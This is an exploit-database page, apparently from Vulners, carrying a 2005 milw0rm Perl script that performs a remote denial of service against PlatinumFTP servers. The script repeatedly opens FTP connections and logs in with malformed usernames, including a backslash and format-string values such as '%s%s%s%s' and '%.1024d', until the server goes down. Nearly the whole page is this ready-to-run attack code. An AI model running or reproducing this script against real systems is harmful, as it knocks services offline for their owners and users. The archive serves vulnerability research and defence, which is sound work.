Lucene search
K

PlatinumFTP <= 1.0.18 Multiple Remote Denial of Service Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 19 Views

Remote DoS against PlatinumFTP 10.1.18, change Timeout to bring server dow

Code

                                                #!/usr/bin/perl
#
# pftpdos-ai1.pl - Remote DoS against PlatinumFTP 10.1.18
# Details:http://seclists.org/lists/bugtraq/2005/Mar/0222.html
#
# If you don&#39;t get the server down try to change/play a little bit with
# the Timeout
#
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
# revised and all guys at www.whitehat.co.il
#
# Thanks to str0ke from milw0rm for forcing me to shrink 3 PoCs into 1 :)
#
# 2005/05/03 portsonline.net

use strict;
use Net::FTP;

my $host;
my $username;
my $dostype;

if ($#ARGV &#60; 1) { &syntax(); }

$host = $ARGV[0];
$dostype = $ARGV[1];

if ($dostype == &#39;1&#39;) { $username = &#39;\\&#39;; }
if ($dostype == &#39;2&#39;) { $username = &#39;%s%s%s%s&#39;; }
if ($dostype == &#39;3&#39;) { $username = &#39;%.1024d&#39;; }

my $ftp = Net::FTP-&#62;new($host, Timeout =&#62; 2, Debug =&#62; 0, Port =&#62; 21)
or die &#34;can you see a ftp server? i can&#39;t.\n&#34;;

print &#34;denial of service tpye $dostype in progress\n&#34;;

while (my $ftp = Net::FTP-&#62;new($host, Timeout =&#62; 2, Debug =&#62; 0, Port =&#62; 21))
{
    my $ftp = Net::FTP-&#62;new($host, Timeout =&#62; 0.1, Debug =&#62; 0, Port =&#62; 21);
    $ftp-&#62;login($username);
}

print &#34;server is down. now run forest, RUN!\n&#34;;

sub syntax {
    print &#34;Usage: pftpdos-ai1.pl IP DOSTYPE(1-3)\n\n&#34;;
    print &#34;DOSTYPE: 1 Using &#39;\\&#39; Username \n&#34;;
    print &#34;DOSTYPE: 2 Using &#39;%s%s%s%s&#39; Username \n&#34;;
    print &#34;DOSTYPE: 3 Using &#39;%.1024d&#39; Username \n&#34;;
    exit (1);
}

# milw0rm.com [2005-03-17]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
19